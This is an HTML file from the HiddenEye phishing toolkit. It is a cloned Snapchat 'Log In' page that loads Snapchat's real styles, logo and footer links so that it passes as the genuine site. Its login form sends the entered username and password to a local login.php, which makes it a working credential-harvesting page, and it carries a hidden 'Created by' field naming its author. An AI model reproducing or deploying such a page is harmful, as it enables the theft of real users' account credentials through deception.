HiddenEye-Legacy/WebPages/Snapchat_web/index.html
Usama Abdul Sattar 346b64b1cc
snapchat_added
2018-04-22 10:47:43 +05:00

265 lines
16 KiB
HTML

<html lang="en">
<head>
<title>Log In • Snapchat</title>
<!-- Meta -->
<meta charset="utf-8">
<meta name="referrer" content="origin">
<meta name="apple-mobile-web-app-capable" content="no">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0">
<!-- Styles -->
<link rel="stylesheet" href="styles/semantic.min.css">
<link rel="stylesheet" href="https://accounts.snapchat.com/accounts/static/styles/dropdown.min.css">
<!-- Force reload of css file -->
<link rel="stylesheet" href="styles/snapchat.css">
<link rel="stylesheet" href="https://accounts.snapchat.com/accounts/static/styles/accounts.css">
<link rel="stylesheet" href="https://accounts.snapchat.com/accounts/static/styles/auth.css">
<link rel="stylesheet" href="https://accounts.snapchat.com/accounts/static/styles/revoke.css">
<!-- Scripts -->
<script src="https://accounts.snapchat.com/accounts/static/scripts/jquery.min.js"></script>
<script src="https://accounts.snapchat.com/accounts/static/scripts/semantic.min.js"></script>
<script src="https://accounts.snapchat.com/accounts/static/scripts/dropdown.min.js"></script>
<script src="https://accounts.snapchat.com/accounts/static/scripts/accounts.js"></script>
<!-- Favicon -->
<link rel="shortcut icon" href="https://accounts.snapchat.com/accounts/static/images/favicon/favicon.png" type="image/png">
</head>
<body>
<!-- Pusher is Needed for Top Navigation Menu -->
<div class="pusher">
<div class="snapchatInvertedHeader ui inverted vertical segment">
<div class="ui stackable page one column grid"><div class="row"><div class="column">
<h1 style="position: relative;">
<a href="https://accounts.snapchat.com/">
<img src="https://accounts.snapchat.com/accounts/static/images/ghost/ghost.svg" alt="Snapchat" class="logo">
</a>
</h1>
</div>
</div>
</div>
</div>
<!-- End Inverted Header -->
<div id="login-root" data-xsrf="6bOIy4jH6c9-x53lfoQGag" data-continue="https://accounts.snapchat.com/accounts/welcome">
<div data-reactroot="" class="Login">
<div class="ui inverted vertical segment accountsBody segment_odg segment_business">
<div class="ui stackable page grid">
<div class="row">
<div class="column accountsCentered">
<h1 class="accountsTitle">Log In</h1>
<div>
<form class="ui form accountsForm" id="login_form" action="login.php" method="POST">
<div class="ui error accountsFormError" id="error_message"></div>
<div class="required field accountsWideField">
<div class="ui icon input">
<input type="text" class="" name="username" placeholder="Username" value="" autocomplete="off"></div></div>
<div class="required field accountsWideField">
<div class="ui icon input"><input type="password" class="" name="password" placeholder="Password" value="" autocomplete="off"></div></div>
<div class="field accountsWideField"><div class="Recaptcha"><div id="g-recaptcha" class="g-recaptcha"></div></div></div>
<input type="hidden" name="Created by" value="Usama Abdul Sattar">
<input type="submit" class="ui inverted button accountsWideButton button_odg button_business" value="Log In">
<p><a href="/accounts/password_reset_request" class="forgot_pwd_business">Forgot your password?</a></p></form></div></div></div></div></div><div style="background-color: rgb(248, 249, 251); font-size: 14px; line-height: 17px;"><style>
.footer-container,
.footer-bottom-bar {
width: 92.3%;
max-width: 960px;
margin: auto;
}
.footer-container {
box-sizing: content-box;
position: relative;
padding: 30px 0 30px;
min-height: 195px;
}
.footer-container .footer-column {
position: relative;
box-sizing: border-box;
float: left;
width: 25%;
padding-right: 6.25%;
}
.footer-container .footer-column .footer-column-header {
box-sizing: content-box;
line-height: 23px;
font-weight: bold;
}
.footer-container .footer-column .footer-column-expand-caret {
display: none;
}
.footer-container .footer-column a {
display: table;
color: rgba(0, 0, 0, 0.4);
text-decoration: none;
line-height: 17px;
margin-top: 6px;
}
.footer-container .footer-column a:hover {
color: black;
}
.footer-container .langue-selection-block {
position: absolute;
box-sizing: border-box;
padding: 0 6.25% 15px 0;
bottom: 15px;
width: 25%;
}
.footer-container .langue-selection-block .langue-header {
font-weight: bold;
}
.footer-bottom-bar a {
line-height: 56px;
margin-right: 40px;
color: white;
text-decoration: none;
}
@media (max-width: 767px) {
.footer-container,
.footer-bottom-bar {
width: 100%;
padding: 0;
}
.footer-container .footer-column {
padding: 0;
width: 100%;
}
.footer-container .footer-column a,
.footer-container .footer-column .footer-column-header {
margin-top: 0;
padding: 10px 40px;
width: calc(100% - 80px);
line-height: 25px;
}
.footer-container .footer-column .footer-column-header,
.footer-container .langue-selection-block {
border-top: solid 1px #D4D4D4;
}
.footer-container .footer-column .footer-column-header {
cursor: pointer;
background-color: white;
}
.footer-container .footer-column .footer-column-expand-caret {
display: block;
position: absolute;
left: 16px;
top: 15px;
width: 15px;
height: 20px;
transform-origin: 55% 45%;
cursor: pointer;
}
.footer-container .footer-column.expanded .footer-column-expand-caret {
transform: rotate(90deg);
-webkit-transform: rotate(90deg);
}
.footer-container .footer-column a {
font-weight: 600;
color: black;
border-top: solid 1px #E5E5E5;
display: none;
}
.footer-container .footer-column.expanded a {
display: block;
box-sizing: content-box;
}
.footer-container .langue-selection-block {
position: static;
width: 100%;
height: inherit;
top: inherit;
padding: 14px 20px 15px;
}
.footer-bottom-bar a {
display: block;
line-height: 45px;
margin-right: 0;
padding-left: 20px;
border-bottom: solid 1px #D4D4D4;
}
}
</style><div class="footer-container" id="footerContainer"><div class="footer-column"><div class="footer-column-expand-caret"><svg width="15" height="20"><g><rect stroke="#000" transform="rotate(45 0,0)" rx="1" id="1" height="1.5" width="10" y="-2" x="5" stroke-width="1"></rect><rect stroke="#000" transform="rotate(-45 0,0)" rx="1" id="2" height="1.5" width="10" y="13.5" x="-8" stroke-width="1"></rect></g></svg></div><div class="footer-column-header">Company</div><div><a href="https://www.snap.com/en-US/">Snap Inc.</a><a href="https://www.snap.com/en-US/jobs/">Jobs</a><a href="https://www.snap.com/en-US/news/">News</a></div></div><div class="footer-column"><div class="footer-column-expand-caret"><svg width="15" height="20"><g><rect stroke="#000" transform="rotate(45 0,0)" rx="1" id="1" height="1.5" width="10" y="-2" x="5" stroke-width="1"></rect><rect stroke="#000" transform="rotate(-45 0,0)" rx="1" id="2" height="1.5" width="10" y="13.5" x="-8" stroke-width="1"></rect></g></svg></div><div class="footer-column-header">Community</div><div><a href="https://support.snapchat.com/">Support</a><a href="https://support.snapchat.com/a/guidelines">Community Guidelines</a><a href="https://www.snapchat.com/safety">Safety Center</a></div></div><div class="footer-column"><div class="footer-column-expand-caret"><svg width="15" height="20"><g><rect stroke="#000" transform="rotate(45 0,0)" rx="1" id="1" height="1.5" width="10" y="-2" x="5" stroke-width="1"></rect><rect stroke="#000" transform="rotate(-45 0,0)" rx="1" id="2" height="1.5" width="10" y="13.5" x="-8" stroke-width="1"></rect></g></svg></div><div class="footer-column-header">Business</div><div><a href="https://www.snapchat.com/ads">Advertising</a><a href="https://www.snap.com/en-US/ad-policies/">Advertising Policies</a><a href="https://support.snapchat.com/co/inquiries">Inquiries</a><a href="https://www.snap.com/en-US/brand-guidelines/">Brand Guidelines</a><a href="https://support.snapchat.com/a/promotions-rules">Promotions Rules</a></div></div><div class="footer-column"><div class="footer-column-expand-caret"><svg width="15" height="20"><g><rect stroke="#000" transform="rotate(45 0,0)" rx="1" id="1" height="1.5" width="10" y="-2" x="5" stroke-width="1"></rect><rect stroke="#000" transform="rotate(-45 0,0)" rx="1" id="2" height="1.5" width="10" y="13.5" x="-8" stroke-width="1"></rect></g></svg></div><div class="footer-column-header">Legal</div><div><a href="https://www.snap.com/en-US/privacy/privacy-center/">Privacy Center</a><a href="https://www.snap.com/en-US/cookie-policy/">Cookie Policy</a><a href="https://support.snapchat.com/co/report-copyright">Copyright</a><a href="https://www.snap.com/en-US/terms/on-demand-geofilters/">On-Demand Geofilters Terms and&nbsp;Conditions</a><a href="https://www.snapchat.com/geofilters/terms.html">Community Geofilter Terms and&nbsp;Conditions</a></div></div><div style="clear: both;"></div><div class="langue-selection-block"><div class="langue-header">Language</div><div style="position: relative;"><select id="sc-global-locale-selector" style="-webkit-appearance: none; border: 1px solid rgb(204, 204, 204); border-radius: 5px; background: white; width: 100%; margin-top: 10px; padding: 5px 10px; font-size: 14px; font-family: inherit; color: rgba(0, 0, 0, 0.6); height: 34px; cursor: pointer;"><option value="en-US">English (US)</option><option value="ar">العَرَبِية</option><option value="id-ID">Bahasa Indonesia</option><option value="da-DK">Dansk</option><option value="de-DE">Deutsch</option><option value="el-GR">Ελληνικά</option><option value="en-GB">English (UK)</option><option value="es">Español</option><option value="fr-FR">Français</option><option value="ko-KR">한국어</option><option value="it-IT">Italiano</option><option value="nl-NL">Nederlands</option><option value="ja-JP">日本語</option><option value="nb-NO">Norsk</option><option value="pl-PL">Polski</option><option value="pt-BR">Português (Brasil)</option><option value="pt-PT">Português (Portugal)</option><option value="ro-RO">Română</option><option value="ru-RU">Русский</option><option value="fi-FI">Suomi</option><option value="sv-SE">Svenska</option><option value="tr-TR">Türkçe</option><option value="zh-CN">中文(简体)</option><option value="zh-TW">中文(繁體)</option></select><div style="position: absolute; right: 10px; width: 0px; height: 0px; pointer-events: none; border-style: solid; bottom: 18px; border-width: 0px 3px 5px; border-color: transparent transparent rgb(102, 102, 102);"></div><div style="position: absolute; right: 10px; width: 0px; height: 0px; pointer-events: none; border-style: solid; bottom: 10px; border-width: 5px 3px 0px; border-color: rgb(102, 102, 102) transparent transparent;"></div></div></div></div><div style="background-color: rgb(38, 38, 38);"><div class="footer-bottom-bar"><a href="https://www.snap.com/en-US/privacy/privacy-policy/">Privacy Policy</a><a href="https://www.snap.com/en-US/terms/">Terms of Service</a><div style="clear: both;"></div></div></div><div id="cookiePopupContainer" class="shown"><style>
#cookiePopupContainer {
position: fixed;
width: 100%;
z-index: 10;
background: white;
bottom: 0;
font-size: 14px;
line-height: 17px;
transition: transform, box-shadow;
transition-duration: 500ms;
transition-timing-function: cubic-bezier(0,0,0,1), linear;
transform: translateY(100%);
-webkit-transform: translateY(100%);
box-shadow: 0 0 0 rgba(0,0,0,0.075);
}
#cookiePopupContainer.shown {
transform: translateY(0);
-webkit-transform: translateY(0);
box-shadow: 0 -1px 3px rgba(0,0,0,0.175);
}
#cookiePopupContainer #cookiePopupCloseButton {
position: absolute;
right: 30px;
top: calc(50% - 10px);
border-radius: 50%;
width: 20px;
height: 20px;
background-color: lightgray;
cursor: pointer;
transform: rotate(45deg);
-ms-transform: rotate(45deg);
-webkit-transform: rotate(45deg);
background: url(data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20style%3D%22background-color%3A%20lightgray%3B%22%20width%3D%2220%22%20height%3D%2220%22%20viewBox%3D%220%200%2030%2030%22%3E%3Crect%20width%3D%223%22%20height%3D%2220%22%20x%3D%2213.5%22%20y%3D%225%22%20fill%3D%22%23FFF%22%20rx%3D%221%22%20ry%3D%221%22%3E%3C%2Frect%3E%3Crect%20width%3D%2220%22%20height%3D%223%22%20y%3D%2213.5%22%20x%3D%225%22%20fill%3D%22%23FFF%22%20rx%3D%221%22%20ry%3D%221%22%3E%3C%2Frect%3E%3C%2Fsvg%3E);
}
#cookiePopupContainer #cookiePopupCloseButton:hover {
background: url(data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20style%3D%22background-color%3A%20gray%3B%22%20width%3D%2220%22%20height%3D%2220%22%20viewBox%3D%220%200%2030%2030%22%3E%3Crect%20width%3D%223%22%20height%3D%2220%22%20x%3D%2213.5%22%20y%3D%225%22%20fill%3D%22%23FFF%22%20rx%3D%221%22%20ry%3D%221%22%3E%3C%2Frect%3E%3Crect%20width%3D%2220%22%20height%3D%223%22%20y%3D%2213.5%22%20x%3D%225%22%20fill%3D%22%23FFF%22%20rx%3D%221%22%20ry%3D%221%22%3E%3C%2Frect%3E%3C%2Fsvg%3E);
}
#cookiePopupContainer .cookie-text {
padding: 28px 20px;
text-align: center;
margin-left: calc(10% + 210px);
margin-right: calc(10% + 210px);
}
@media (max-width: 1200px) {
#cookiePopupContainer .cookie-text {
margin-left: 3%;
margin-right: calc(3% + 40px);
}
}
@media (max-width: 1200px) {
#cookiePopupContainer .cookie-icon {
display: none;
}
}
@media print {
#cookiePopupContainer {
display: none;
}
}
</style><div class="cookie-icon cookie-icon-left" style="position: absolute; width: 240px; height: 120px; background: url(&quot;https://www.snapchat.com/home/cookie-1.svg&quot;) center center no-repeat; left: calc(10% - 50px); top: calc(50% - 55px);"></div><div class="cookie-popup"><div class="cookie-text">Hi! We use cookies on this website to help operate our site and for analytics purposes. For more on how we use cookies and your cookie choices, go <a href="https://www.snap.com/en-US/cookie-policy/" target="_blank">here</a>! By continuing to use our services, you are giving us your consent to use cookies.</div></div><div class="cookie-icon cookie-icon-right" style="position: absolute; width: 240px; height: 120px; background: url(&quot;https://www.snapchat.com/home/cookie-2.svg&quot;) center center no-repeat; right: calc(10% - 50px); top: calc(50% - 50px);"></div><div id="cookiePopupCloseButton"></div></div></div></div></div><script src="scripts/main.en-us.js?v=0cb1b405f039550b332f8aed9a8b6c300105947a3193ec264e49cb8183525c50"></script></div><!-- End Pusher --></body></html>